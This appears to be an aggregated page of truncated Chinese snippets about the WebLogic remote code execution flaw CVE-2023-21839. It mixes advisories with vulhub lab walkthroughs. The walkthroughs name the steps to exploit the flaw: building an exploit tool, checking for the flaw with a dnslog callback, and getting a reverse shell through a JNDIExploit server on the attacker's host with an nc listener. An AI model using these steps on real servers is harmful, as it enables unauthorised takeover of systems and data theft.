CVE-2023-21839是在反序列化过程中没有进行恶意操作,在完成反序列化过程后执行了漏洞类ForeignOpaqueReference中getReferent()方法中的lookup()才触发的漏洞。 其中,Context的lookup方法是用来查找指定名称的对象的,它接受一个字符串参数,返回一个Object对象,如果没有找到指定名称的对象,则返回null,我们则利用此点触发反...
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839) 前言:Weblogic允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。 0x00 环境设置 此次实验,我们使用P神的vulhub。启动环境: cd /vulhub-master/weblogic/CVE-2023-21839 docker compose...
参考材料 1.Oracle Critical Patch Update Advisory - January 2023 2.https://www.pingsafe.com/blog/cve-2023-21839-oracle-weblogic-server-core-patch-advisory 3.https://docs.oracle.com/html/E80373_03/weblogic/jndi/OpaqueReference.htmlhttps://docs.oracle.com/en/ 关于Portal Lab 星阑科技 Portal La...
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。影响范...
gobuild -o CVE-2023-21839.exe 然后目录下会生成该漏洞利用的exe文件 拷贝出来进行漏洞探测:发现dnslog存在回显,说明存在漏洞,如果报错之类的,可能是不存在该漏洞。 (4)反弹shell: 使用github上已经放出来的JNDI的漏洞利用工具,在自己的公网服务器开启rmi服务,监听1389端口。(注:记得不要写0.0.0.0,要写你的公网...
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。 影响版本 WebLogic_Server = 12.2.1.3.0 ...
CVE-2023-21839这一漏洞允许攻击者远程执行代码,获取服务器权限,会对企业网络和数据造成严重损失。因此,长扬科技安全研究院建议您采取以下有效措施来保护Weblogic服务器免受攻击:首先,我们需要对Weblogic服务器进行深入的漏洞分析,了解漏洞的本质和可能产生的影响。通过分析漏洞的原理,我们可以找到漏洞的入口点,并...
2023 年 4 月 19 日, Oracle 发布安全补丁修复 WebLogic 中间件漏 洞存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管...
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839运行命令: docker-compose up -d然后访问ip:7001/console就可以看到weblogic界面了 2.反弹shell 启动JNDI中转服务 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i IP 再监听个端口 nc -lnvp PORT 利用工具进行攻击 https://wwkn.lanzn.com...
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)的详细操作如下:首先,使用P神的vulhub启动环境,然后通过访问http://your-ip:7001/console,可以看到管理界面。为了验证漏洞,利用编译好的工具让目标靶机对dnslog平台发送请求,平台成功接收到了请求。接下来,准备工作中,打开一台kali进行shellpayload的...